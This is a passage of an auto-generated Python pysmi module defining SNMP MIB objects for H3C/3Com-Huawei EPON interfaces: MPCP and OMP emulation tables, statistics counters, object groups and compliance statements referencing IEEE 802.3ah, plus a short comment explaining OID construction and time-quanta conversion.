h3cDot3MpcpReceiveElapsed = MibTableColumn((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 42, 2, 1, 1, 1, 1, 8), Integer32()).setUnits('TQ (16nsec)').setMaxAccess("readonly")
if mibBuilder.loadTexts: h3cDot3MpcpReceiveElapsed.setReference('[802.3ah], 30.3.5.1.20.')
if mibBuilder.loadTexts: h3cDot3MpcpReceiveElapsed.setStatus('current')
if mibBuilder.loadTexts: h3cDot3MpcpReceiveElapsed.setDescription('A read-only value that reports the interval from last MPCP frame reception in increments of Time Quanta (TQ) 16ns. The value returned shall be (interval from last MPCP frame reception in ns)/16. If this value exceeds (2^32-1) the value (2^32-1) shall be returned. This attribute is relevant for an OLT and an ONU.')
h3cDot3MpcpRoundTripTime = MibTableColumn((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 42, 2, 1, 1, 1, 1, 9), Integer32()).setUnits('TQ (16nsec)').setMaxAccess("readonly")
if mibBuilder.loadTexts: h3cDot3MpcpRoundTripTime.setReference('[802.3ah], 30.3.5.1.21.')
if mibBuilder.loadTexts: h3cDot3MpcpRoundTripTime.setStatus('current')
if mibBuilder.loadTexts: h3cDot3MpcpRoundTripTime.setDescription('A read-only value that reports the MPCP round trip time in increments of Time Quanta (TQ) 16ns. The value returned shall be (round trip time in ns)/16. If this value exceeds (2^16-1) the value (2^16-1) shall be returned. This attribute is relevant for an OLT and an ONU. For the OLT there is a value per LLID')
h3cDot3MpcpMaximumPendingGrants = MibTableColumn((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 42, 2, 1, 1, 1, 1, 10), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 255))).setMaxAccess("readonly")
if mibBuilder.loadTexts: h3cDot3MpcpMaximumPendingGrants.setReference('[802.3ah], 30.3.5.1.24.')
if mibBuilder.loadTexts: h3cDot3MpcpMaximumPendingGrants.setStatus('current')
if mibBuilder.loadTexts: h3cDot3MpcpMaximumPendingGrants.setDescription('A read-only value that indicates the maximum number of grants an ONU can store. The maximum number of grants an ONU can store has a range of 0 to 255. This attribute is relevant for an OLT and an ONU. For the OLT there is a value per LLID')
h3cDot3MpcpAdminState = MibTableColumn((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 42, 2, 1, 1, 1, 1, 11), TruthValue().clone('false')).setMaxAccess("readwrite")
if mibBuilder.loadTexts: h3cDot3MpcpAdminState.setReference('[802.3ah], 30.3.5.2.1.')
if mibBuilder.loadTexts: h3cDot3MpcpAdminState.setStatus('current')
if mibBuilder.loadTexts: h3cDot3MpcpAdminState.setDescription('This variable can be used to define the operational state of the Multi-Point MAC Control sublayer as defined in [802.3ah] clause 64. Selecting admin for an interface with Multi-Point MAC Control sublayer. When selecting the value as True the interface Multi-Point control protocol is enabled. When selecting the value as False the interface acts as if the Multi-point Control protocol does not exist. Reading reflects the state of the attribute and the operation of the Multi-point control protocol mode of the interface. Writing can be done all the time. This attribute is relevant for an OLT and an ONU.')
h3cDot3MpcpOnTime = MibTableColumn((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 42, 2, 1, 1, 1, 1, 12), Integer32()).setUnits('TQ (16nsec)').setMaxAccess("readonly")
if mibBuilder.loadTexts: h3cDot3MpcpOnTime.setReference('[802.3ah], 64.3.5.1.')
if mibBuilder.loadTexts: h3cDot3MpcpOnTime.setStatus('current')
if mibBuilder.loadTexts: h3cDot3MpcpOnTime.setDescription('A read-only value that reports the -on time- for a grant burst in increments of Time Quanta (TQ) 16ns as defined in [802.3ah] 60,64. The value returned shall be (on time ns)/16. If this value exceeds (2^32-1) the value (2^32-1) shall be returned. This attribute is relevant for an OLT and an ONU.')
h3cDot3MpcpOffTime = MibTableColumn((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 42, 2, 1, 1, 1, 1, 13), Integer32()).setUnits('TQ (16nsec)').setMaxAccess("readonly")
if mibBuilder.loadTexts: h3cDot3MpcpOffTime.setReference('[802.3ah], 64.3.5.1.')
if mibBuilder.loadTexts: h3cDot3MpcpOffTime.setStatus('current')
if mibBuilder.loadTexts: h3cDot3MpcpOffTime.setDescription('A read-only value that reports the -off time- for a grant burst in increments of Time Quanta (TQ) 16ns as defined in [802.3ah] 60,64. The value returned shall be (off time ns)/16. If this value exceeds (2^32-1) the value (2^32-1) shall be returned. This attribute is relevant for an OLT and an ONU.')
h3cDot3MpcpSyncTime = MibTableColumn((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 42, 2, 1, 1, 1, 1, 14), Integer32()).setUnits('TQ (16nsec)').setMaxAccess("readonly")
if mibBuilder.loadTexts: h3cDot3MpcpSyncTime.setReference('[802.3ah], 64.3.3.2.')
if mibBuilder.loadTexts: h3cDot3MpcpSyncTime.setStatus('current')
if mibBuilder.loadTexts: h3cDot3MpcpSyncTime.setDescription('A read-only value that reports the -sync lock time- for an OLT receiver in increments of Time Quanta (TQ) 16ns as defined in [802.3ah] 60,64,65. The value returned shall be (sync lock time ns)/16. If this value exceeds (2^32-1) the value (2^32-1) shall be returned. This attribute is relevant for an OLT and an ONU.')
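# --- illustrative notes (assumptions, not emitted by pysmi) -------------------
# The object-identifier tuples above map to dotted OIDs by joining their
# components, and a concrete instance of a columnar object is addressed by
# appending the ifIndex of the EPON interface (the index of h3cDot3MpcpEntry).
_exampleMpcpIdOid = '.'.join(str(n) for n in (1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 42, 2, 1, 1, 1, 1, 1))
# _exampleMpcpIdOid == '1.3.6.1.4.1.43.45.1.10.2.42.2.1.1.1.1.1' (h3cDot3MpcpID)
# The timing objects above are reported in Time Quanta of 16 ns, so a reading of,
# say, 3000 TQ for h3cDot3MpcpRoundTripTime corresponds to 3000 * 16 = 48000 ns.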
h3cDot3MpcpStatTable = MibTable((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 42, 2, 1, 1, 2), )
if mibBuilder.loadTexts: h3cDot3MpcpStatTable.setStatus('current')
if mibBuilder.loadTexts: h3cDot3MpcpStatTable.setDescription('This table defines the list of statistics counters of [802.3ah] clause 64 MPCP interface.')
h3cDot3MpcpStatEntry = MibTableRow((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 42, 2, 1, 1, 2, 1), ).setIndexNames((0, "IF-MIB", "ifIndex"))
if mibBuilder.loadTexts: h3cDot3MpcpStatEntry.setStatus('current')
if mibBuilder.loadTexts: h3cDot3MpcpStatEntry.setDescription('Table entries for table of statistics counters of [802.3ah] clause 64 MPCP interface.')
h3cDot3MpcpMACCtrlFramesTransmitted = MibTableColumn((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 42, 2, 1, 1, 2, 1, 1), Counter32()).setUnits('frames').setMaxAccess("readonly")
if mibBuilder.loadTexts: h3cDot3MpcpMACCtrlFramesTransmitted.setReference('[802.3ah], 30.3.5.1.7.')
if mibBuilder.loadTexts: h3cDot3MpcpMACCtrlFramesTransmitted.setStatus('current')
if mibBuilder.loadTexts: h3cDot3MpcpMACCtrlFramesTransmitted.setDescription('A count of MPCP frames passed to the MAC sublayer for transmission. This counter is incremented when a MA_CONTROL.request service primitive is generated within the MAC control sublayer with an opcode indicating a MPCP frame. This attribute is relevant for an OLT and an ONU.')
h3cDot3MpcpMACCtrlFramesReceived = MibTableColumn((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 42, 2, 1, 1, 2, 1, 2), Counter32()).setUnits('frames').setMaxAccess("readonly")
if mibBuilder.loadTexts: h3cDot3MpcpMACCtrlFramesReceived.setReference('[802.3ah], 30.3.5.1.8.')
if mibBuilder.loadTexts: h3cDot3MpcpMACCtrlFramesReceived.setStatus('current')
if mibBuilder.loadTexts: h3cDot3MpcpMACCtrlFramesReceived.setDescription('A count of MPCP frames passed by the MAC sublayer to the MAC Control sublayer. This counter is incremented when a ReceiveFrame function call returns a valid frame with: (1) a lengthOrType field value equal to the reserved Type for 802.3_MAC_Control as specified in 31.4.1.3, and (2) an opcode indicating a MPCP frame. This attribute is relevant for an OLT and an ONU.')
h3cDot3MpcpDiscoveryWindowsSent = MibTableColumn((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 42, 2, 1, 1, 2, 1, 3), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: h3cDot3MpcpDiscoveryWindowsSent.setReference('[802.3ah], 30.3.5.1.22.')
if mibBuilder.loadTexts: h3cDot3MpcpDiscoveryWindowsSent.setStatus('current')
if mibBuilder.loadTexts: h3cDot3MpcpDiscoveryWindowsSent.setDescription('A count of discovery windows generated. The counter is incremented by one for each generated discovery window. This attribute is relevant for an OLT and an ONU. At the ONU value should be zero.')
h3cDot3MpcpDiscoveryTimeout = MibTableColumn((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 42, 2, 1, 1, 2, 1, 4), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: h3cDot3MpcpDiscoveryTimeout.setReference('[802.3ah], 30.3.5.1.23.')
if mibBuilder.loadTexts: h3cDot3MpcpDiscoveryTimeout.setStatus('current')
if mibBuilder.loadTexts: h3cDot3MpcpDiscoveryTimeout.setDescription('A count of the number of times a discovery timeout occurs. Increment the counter by one for each discovery processing state-machine reset resulting from timeout waiting for message arrival. This attribute is relevant for an OLT and an ONU.')
h3cDot3MpcpTxRegRequest = MibTableColumn((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 42, 2, 1, 1, 2, 1, 5), Counter32()).setUnits('frames').setMaxAccess("readonly")
if mibBuilder.loadTexts: h3cDot3MpcpTxRegRequest.setReference('[802.3ah], 30.3.5.1.12.')
if mibBuilder.loadTexts: h3cDot3MpcpTxRegRequest.setStatus('current')
if mibBuilder.loadTexts: h3cDot3MpcpTxRegRequest.setDescription('A count of the number of times a REGISTER_REQ MPCP frames transmission occurs. Increment the counter by one for each REGISTER_REQ MPCP frame transmitted as defined in [802.3ah] clause 64. This counter is mandatory for an ONU. This attribute is relevant for an OLT and an ONU. At the OLT value should be zero.')
h3cDot3MpcpRxRegRequest = MibTableColumn((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 42, 2, 1, 1, 2, 1, 6), Counter32()).setUnits('frames').setMaxAccess("readonly")
if mibBuilder.loadTexts: h3cDot3MpcpRxRegRequest.setReference('[802.3ah], 30.3.5.1.17.')
if mibBuilder.loadTexts: h3cDot3MpcpRxRegRequest.setStatus('current')
if mibBuilder.loadTexts: h3cDot3MpcpRxRegRequest.setDescription('A count of the number of times a REGISTER_REQ MPCP frames reception occurs. A single counter at the ONU and a set of counters, one for each LLID, at the OLT. Increment the counter by one for each REGISTER_REQ MPCP frame received for each LLID as defined in [802.3ah] clause 64. This counter is mandatory for an ONU and for an OLT. At the ONU value should be zero.')
h3cDot3MpcpTxRegAck = MibTableColumn((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 42, 2, 1, 1, 2, 1, 7), Counter32()).setUnits('frames').setMaxAccess("readonly")
if mibBuilder.loadTexts: h3cDot3MpcpTxRegAck.setReference('[802.3ah], 30.3.5.1.10.')
if mibBuilder.loadTexts: h3cDot3MpcpTxRegAck.setStatus('current')
if mibBuilder.loadTexts: h3cDot3MpcpTxRegAck.setDescription('A count of the number of times a REGISTER_ACK MPCP frames transmission occurs. Increment the counter by one for each REGISTER_ACK MPCP frame transmitted as defined in [802.3ah] clause 64. This counter is mandatory for an ONU. This attribute is relevant for an OLT and an ONU. At the OLT the value should be zero.')
h3cDot3MpcpRxRegAck = MibTableColumn((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 42, 2, 1, 1, 2, 1, 8), Counter32()).setUnits('frames').setMaxAccess("readonly")
if mibBuilder.loadTexts: h3cDot3MpcpRxRegAck.setReference('[802.3ah], 30.3.5.1.15.')
if mibBuilder.loadTexts: h3cDot3MpcpRxRegAck.setStatus('current')
if mibBuilder.loadTexts: h3cDot3MpcpRxRegAck.setDescription('A count of the number of times a REGISTER_ACK MPCP frames reception occurs. A single counter at the ONU and a set of counters, one for each LLID, at the OLT. Increment the counter by one for each REGISTER_ACK MPCP frame received for each LLID, as defined in [802.3ah] clause 64. This counter is mandatory for an ONU and for an OLT. At the ONU the value should be zero.')
h3cDot3MpcpTxReport = MibTableColumn((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 42, 2, 1, 1, 2, 1, 9), Counter32()).setUnits('frames').setMaxAccess("readonly")
if mibBuilder.loadTexts: h3cDot3MpcpTxReport.setReference('[802.3ah], 30.3.5.1.13.')
if mibBuilder.loadTexts: h3cDot3MpcpTxReport.setStatus('current')
if mibBuilder.loadTexts: h3cDot3MpcpTxReport.setDescription('A count of the number of times a REPORT MPCP frames transmission occurs. Increment the counter by one for each REPORT MPCP frame transmitted as defined in [802.3ah] clause 64. This counter is mandatory for an ONU. This attribute is relevant for an OLT and an ONU. At the OLT value should be zero.')
h3cDot3MpcpRxReport = MibTableColumn((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 42, 2, 1, 1, 2, 1, 10), Counter32()).setUnits('frames').setMaxAccess("readonly")
if mibBuilder.loadTexts: h3cDot3MpcpRxReport.setReference('[802.3ah], 30.3.5.1.18.')
if mibBuilder.loadTexts: h3cDot3MpcpRxReport.setStatus('current')
if mibBuilder.loadTexts: h3cDot3MpcpRxReport.setDescription('A count of the number of times a REPORT MPCP frames reception occurs. A single counter at the ONU and a set of counters, one for each LLID, at the OLT. Increment the counter by one for each REPORT MPCP frame received for each LLID, as defined in [802.3ah] clause 64. This counter is mandatory for an ONU and for an OLT. At the ONU value should be zero.')
h3cDot3MpcpTxGate = MibTableColumn((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 42, 2, 1, 1, 2, 1, 11), Counter32()).setUnits('frames').setMaxAccess("readonly")
if mibBuilder.loadTexts: h3cDot3MpcpTxGate.setReference('[802.3ah], 30.3.5.1.9.')
if mibBuilder.loadTexts: h3cDot3MpcpTxGate.setStatus('current')
if mibBuilder.loadTexts: h3cDot3MpcpTxGate.setDescription('A count of the number of times a GATE MPCP frames transmission occurs. A set of counters, one for each LLID, at the OLT. Increment the counter by one for each GATE MPCP frame transmitted, for each LLID, as defined in [802.3ah] clause 64. This counter is mandatory for an OLT. This attribute is relevant for an OLT and an ONU. At the ONU the value should be zero.')
h3cDot3MpcpRxGate = MibTableColumn((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 42, 2, 1, 1, 2, 1, 12), Counter32()).setUnits('frames').setMaxAccess("readonly")
if mibBuilder.loadTexts: h3cDot3MpcpRxGate.setReference('[802.3ah], 30.3.5.1.14.')
if mibBuilder.loadTexts: h3cDot3MpcpRxGate.setStatus('current')
if mibBuilder.loadTexts: h3cDot3MpcpRxGate.setDescription('A count of the number of times a GATE MPCP frames reception occurs. A single counter at the ONU and a set of counters, one for each LLID ,at the OLT. Increment the counter by one for each GATE MPCP frame received, for each LLID, as defined in [802.3ah] clause 64. This counter is mandatory for an ONU and for an OLT. At the OLT the value should be zero.')
h3cDot3MpcpTxRegister = MibTableColumn((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 42, 2, 1, 1, 2, 1, 13), Counter32()).setUnits('frames').setMaxAccess("readonly")
if mibBuilder.loadTexts: h3cDot3MpcpTxRegister.setReference('[802.3ah], 30.3.5.1.11.')
if mibBuilder.loadTexts: h3cDot3MpcpTxRegister.setStatus('current')
if mibBuilder.loadTexts: h3cDot3MpcpTxRegister.setDescription('A count of the number of times a REGISTER MPCP frames transmission occurs. A set of counters, one for each LLID, at the OLT. Increment the counter by one for each REGISTER MPCP frame transmitted, for each LLID, as defined in [802.3ah] clause 64. This counter is mandatory for an OLT. This attribute is relevant for an OLT and an ONU. At the ONU the value should be zero.')
h3cDot3MpcpRxRegister = MibTableColumn((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 42, 2, 1, 1, 2, 1, 14), Counter32()).setUnits('frames').setMaxAccess("readonly")
if mibBuilder.loadTexts: h3cDot3MpcpRxRegister.setReference('[802.3ah], 30.3.5.1.16.')
if mibBuilder.loadTexts: h3cDot3MpcpRxRegister.setStatus('current')
if mibBuilder.loadTexts: h3cDot3MpcpRxRegister.setDescription('A count of the number of times a REGISTER MPCP frames reception occurs. A single counter at the ONU and a set of counters, one for each LLID, at the OLT. Increment the counter by one for each REGISTER MPCP frame received, for each LLID, as defined in [802.3ah] clause 64. This counter is mandatory for an ONU and for an OLT. at the OLT the value should be zero.')
h3cDot3MpcpRxNotSupportedMPCP = MibTableColumn((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 42, 2, 1, 1, 2, 1, 15), Counter32()).setUnits('frames').setMaxAccess("readonly")
if mibBuilder.loadTexts: h3cDot3MpcpRxNotSupportedMPCP.setStatus('current')
if mibBuilder.loadTexts: h3cDot3MpcpRxNotSupportedMPCP.setDescription('A count of the number of times a non-supported MPCP frames reception occurs. A single counter at the ONU and a set of counters, one for each LLID, at the OLT. Increment the counter by one for each non-supported MPCP frame received, for each LLID, as defined in [802.3ah] clause 64. This counter is mandatory for an ONU and for an OLT.')
h3cDot3MpcpGroups = MibIdentifier((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 42, 2, 1, 2, 1))
h3cDot3MpcpGroupBase = ObjectGroup((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 42, 2, 1, 2, 1, 1)).setObjects(("A3COM-HUAWEI-DOT3-EFM-EPON-MIB", "h3cDot3MpcpID"), ("A3COM-HUAWEI-DOT3-EFM-EPON-MIB", "h3cDot3MpcpOperStatus"), ("A3COM-HUAWEI-DOT3-EFM-EPON-MIB", "h3cDot3MpcpMode"), ("A3COM-HUAWEI-DOT3-EFM-EPON-MIB", "h3cDot3MpcpLinkID"), ("A3COM-HUAWEI-DOT3-EFM-EPON-MIB", "h3cDot3MpcpRemoteMACAddress"), ("A3COM-HUAWEI-DOT3-EFM-EPON-MIB", "h3cDot3MpcpRegistrationState"), ("A3COM-HUAWEI-DOT3-EFM-EPON-MIB", "h3cDot3MpcpMaximumPendingGrants"), ("A3COM-HUAWEI-DOT3-EFM-EPON-MIB", "h3cDot3MpcpAdminState"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
    h3cDot3MpcpGroupBase = h3cDot3MpcpGroupBase.setStatus('current')
if mibBuilder.loadTexts: h3cDot3MpcpGroupBase.setDescription('A collection of objects of dot3 Mpcp Basic entity state definition.')
h3cDot3MpcpGroupParam = ObjectGroup((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 42, 2, 1, 2, 1, 2)).setObjects(("A3COM-HUAWEI-DOT3-EFM-EPON-MIB", "h3cDot3MpcpTransmitElapsed"), ("A3COM-HUAWEI-DOT3-EFM-EPON-MIB", "h3cDot3MpcpReceiveElapsed"), ("A3COM-HUAWEI-DOT3-EFM-EPON-MIB", "h3cDot3MpcpRoundTripTime"), ("A3COM-HUAWEI-DOT3-EFM-EPON-MIB", "h3cDot3MpcpOnTime"), ("A3COM-HUAWEI-DOT3-EFM-EPON-MIB", "h3cDot3MpcpOffTime"), ("A3COM-HUAWEI-DOT3-EFM-EPON-MIB", "h3cDot3MpcpSyncTime"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
    h3cDot3MpcpGroupParam = h3cDot3MpcpGroupParam.setStatus('current')
if mibBuilder.loadTexts: h3cDot3MpcpGroupParam.setDescription('A collection of objects of dot3 Mpcp for P2MP parameters.')
h3cDot3MpcpGroupStat = ObjectGroup((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 42, 2, 1, 2, 1, 3)).setObjects(("A3COM-HUAWEI-DOT3-EFM-EPON-MIB", "h3cDot3MpcpMACCtrlFramesTransmitted"), ("A3COM-HUAWEI-DOT3-EFM-EPON-MIB", "h3cDot3MpcpMACCtrlFramesReceived"), ("A3COM-HUAWEI-DOT3-EFM-EPON-MIB", "h3cDot3MpcpDiscoveryWindowsSent"), ("A3COM-HUAWEI-DOT3-EFM-EPON-MIB", "h3cDot3MpcpDiscoveryTimeout"), ("A3COM-HUAWEI-DOT3-EFM-EPON-MIB", "h3cDot3MpcpTxRegRequest"), ("A3COM-HUAWEI-DOT3-EFM-EPON-MIB", "h3cDot3MpcpRxRegRequest"), ("A3COM-HUAWEI-DOT3-EFM-EPON-MIB", "h3cDot3MpcpTxRegAck"), ("A3COM-HUAWEI-DOT3-EFM-EPON-MIB", "h3cDot3MpcpRxRegAck"), ("A3COM-HUAWEI-DOT3-EFM-EPON-MIB", "h3cDot3MpcpTxReport"), ("A3COM-HUAWEI-DOT3-EFM-EPON-MIB", "h3cDot3MpcpRxReport"), ("A3COM-HUAWEI-DOT3-EFM-EPON-MIB", "h3cDot3MpcpTxGate"), ("A3COM-HUAWEI-DOT3-EFM-EPON-MIB", "h3cDot3MpcpRxGate"), ("A3COM-HUAWEI-DOT3-EFM-EPON-MIB", "h3cDot3MpcpTxRegister"), ("A3COM-HUAWEI-DOT3-EFM-EPON-MIB", "h3cDot3MpcpRxRegister"), ("A3COM-HUAWEI-DOT3-EFM-EPON-MIB", "h3cDot3MpcpRxNotSupportedMPCP"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
    h3cDot3MpcpGroupStat = h3cDot3MpcpGroupStat.setStatus('current')
if mibBuilder.loadTexts: h3cDot3MpcpGroupStat.setDescription('A collection of objects of dot3 Mpcp Statistics')
h3cDot3MpcpCompliances = MibIdentifier((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 42, 2, 1, 2, 2))
h3cDot3MpcpCompliance = ModuleCompliance((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 42, 2, 1, 2, 2, 1)).setObjects(("A3COM-HUAWEI-DOT3-EFM-EPON-MIB", "h3cDot3MpcpGroupBase"), ("A3COM-HUAWEI-DOT3-EFM-EPON-MIB", "h3cDot3MpcpGroupParam"), ("A3COM-HUAWEI-DOT3-EFM-EPON-MIB", "h3cDot3MpcpGroupStat"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
    h3cDot3MpcpCompliance = h3cDot3MpcpCompliance.setStatus('current')
if mibBuilder.loadTexts: h3cDot3MpcpCompliance.setDescription('The compliance statement for Multi-point control protocol interfaces.')
h3cDot3OmpEmulationMIB = MibIdentifier((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 42, 2, 2))
h3cDot3OmpEmulationObjects = MibIdentifier((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 42, 2, 2, 1))
h3cDot3OmpeConformance = MibIdentifier((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 42, 2, 2, 2))
h3cDot3OmpEmulationTable = MibTable((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 42, 2, 2, 1, 1), )
if mibBuilder.loadTexts: h3cDot3OmpEmulationTable.setStatus('current')
if mibBuilder.loadTexts: h3cDot3OmpEmulationTable.setDescription('Table for dot3 OmpEmulation MIB modules.')
h3cDot3OmpEmulationEntry = MibTableRow((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 42, 2, 2, 1, 1, 1), ).setIndexNames((0, "IF-MIB", "ifIndex"))
if mibBuilder.loadTexts: h3cDot3OmpEmulationEntry.setStatus('current')
if mibBuilder.loadTexts: h3cDot3OmpEmulationEntry.setDescription('An entry in the dot3 OmpEmulation MIB modules table.')
h3cDot3OmpEmulationID = MibTableColumn((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 42, 2, 2, 1, 1, 1, 1), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: h3cDot3OmpEmulationID.setReference('[802.3ah], 30.3.7.1.1.')
if mibBuilder.loadTexts: h3cDot3OmpEmulationID.setStatus('current')
if mibBuilder.loadTexts: h3cDot3OmpEmulationID.setDescription('The value of h3cDot3OmpEmulationID is assigned so as to uniquely identify a OMPEmulation entity among the subordinate managed objects of the containing object. The value is mandated for an ONU.')
h3cDot3OmpEmulationType = MibTableColumn((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 42, 2, 2, 1, 1, 1, 2), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("unknown", 1), ("olt", 2), ("onu", 3)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: h3cDot3OmpEmulationType.setReference('[802.3ah], 30.3.7.1.2.')
if mibBuilder.loadTexts: h3cDot3OmpEmulationType.setStatus('current')
if mibBuilder.loadTexts: h3cDot3OmpEmulationType.setDescription('A read-only value that indicates the mode of operation of the Reconciliation Sublayer for Point to Point Emulation (see [802.3ah] clause 65.1). unknown(1) value is assigned in initializing, true state or type not yet known. olt(2) value is assigned when Sublayer operating in OLT mode. onu(3) value is assigned when Sublayer operating in ONU mode.')
h3cDot3OmpEmulationStatTable = MibTable((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 42, 2, 2, 1, 2), )
if mibBuilder.loadTexts: h3cDot3OmpEmulationStatTable.setStatus('current')
if mibBuilder.loadTexts: h3cDot3OmpEmulationStatTable.setDescription('This table defines the list of statistics counters of [802.3ah] clause 65 OMP interface.')
h3cDot3OmpEmulationStatEntry = MibTableRow((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 42, 2, 2, 1, 2, 1), ).setIndexNames((0, "IF-MIB", "ifIndex"))
if mibBuilder.loadTexts: h3cDot3OmpEmulationStatEntry.setStatus('current')
if mibBuilder.loadTexts: h3cDot3OmpEmulationStatEntry.setDescription('Table entries for Table of statistics counters of [802.3ah] clause 65 OMP interface.')
h3cDot3OmpEmulationSLDErrors = MibTableColumn((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 42, 2, 2, 1, 2, 1, 1), Counter32()).setUnits('frames').setMaxAccess("readonly")
if mibBuilder.loadTexts: h3cDot3OmpEmulationSLDErrors.setReference('[802.3ah], 30.3.7.1.3.')
if mibBuilder.loadTexts: h3cDot3OmpEmulationSLDErrors.setStatus('current')
if mibBuilder.loadTexts: h3cDot3OmpEmulationSLDErrors.setDescription('A count of frames received that do not contain a valid SLD field as defined in [802.3ah] clause 65.1.3.3.1. This attribute is mandatory for an OLT and optional for an ONU.')
h3cDot3OmpEmulationCRC8Errors = MibTableColumn((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 42, 2, 2, 1, 2, 1, 2), Counter32()).setUnits('frames').setMaxAccess("readonly")
if mibBuilder.loadTexts: h3cDot3OmpEmulationCRC8Errors.setReference('[802.3ah], 30.3.7.1.4.')
if mibBuilder.loadTexts: h3cDot3OmpEmulationCRC8Errors.setStatus('current')
if mibBuilder.loadTexts: h3cDot3OmpEmulationCRC8Errors.setDescription('A count of frames received that contain a valid SLD field, as defined in [802.3ah] clause 65.1.3.3.1, but do not pass the CRC-8 check as defined in [802.3ah] clause 65.1.3.3.3. This attribute is mandatory for an OLT and for an ONU.')
h3cDot3OmpEmulationBadLLID = MibTableColumn((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 42, 2, 2, 1, 2, 1, 3), Counter32()).setUnits('frames').setMaxAccess("readonly")
if mibBuilder.loadTexts: h3cDot3OmpEmulationBadLLID.setReference('[802.3ah], 30.3.7.1.8.')
if mibBuilder.loadTexts: h3cDot3OmpEmulationBadLLID.setStatus('current')
if mibBuilder.loadTexts: h3cDot3OmpEmulationBadLLID.setDescription('A count of frames received that contain a valid SLD field, as defined in [802.3ah] clause 65.1.3.3.1, and pass the CRC-8 check, as defined in [802.3ah] clause 65.1.3.3.3, but are discarded due to the LLID check as defined in [802.3ah] clause 65.1.3.3.2. This attribute is relevant for an OLT and an ONU.')
h3cDot3OmpEmulationGoodLLID = MibTableColumn((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 42, 2, 2, 1, 2, 1, 4), Counter32()).setUnits('frames').setMaxAccess("readonly")
if mibBuilder.loadTexts: h3cDot3OmpEmulationGoodLLID.setReference('[802.3ah], 30.3.7.1.5.')
if mibBuilder.loadTexts: h3cDot3OmpEmulationGoodLLID.setStatus('current')
if mibBuilder.loadTexts: h3cDot3OmpEmulationGoodLLID.setDescription('A count of frames received that contain a valid SLD field, as defined in [802.3ah] clause 65.1.3.3.1, and pass the CRC-8 check, as defined in [802.3ah] clause 65.1.3.3.3. This attribute is relevant for an OLT and an ONU.')
h3cDot3OmpEmulationOnuPonCastLLID = MibTableColumn((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 42, 2, 2, 1, 2, 1, 5), Counter32()).setUnits('frames').setMaxAccess("readonly")
if mibBuilder.loadTexts: h3cDot3OmpEmulationOnuPonCastLLID.setReference('[802.3ah], 30.3.7.1.6.')
if mibBuilder.loadTexts: h3cDot3OmpEmulationOnuPonCastLLID.setStatus('current')
if mibBuilder.loadTexts: h3cDot3OmpEmulationOnuPonCastLLID.setDescription('A count of frames received that contain a valid SLD field in an ONU, as defined in [802.3ah] 65.1.3.3.1, passes the CRC-8 check, as defined in [802.3ah] 65.1.3.3.3, and the frame meets the rule for acceptance defined in [802.3ah] 65.1.3.3.2.')
h3cDot3OmpEmulationOltPonCastLLID = MibTableColumn((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 42, 2, 2, 1, 2, 1, 6), Counter32()).setUnits('frames').setMaxAccess("readonly")
if mibBuilder.loadTexts: h3cDot3OmpEmulationOltPonCastLLID.setReference('[802.3ah], 30.3.7.1.7.')
if mibBuilder.loadTexts: h3cDot3OmpEmulationOltPonCastLLID.setStatus('current')
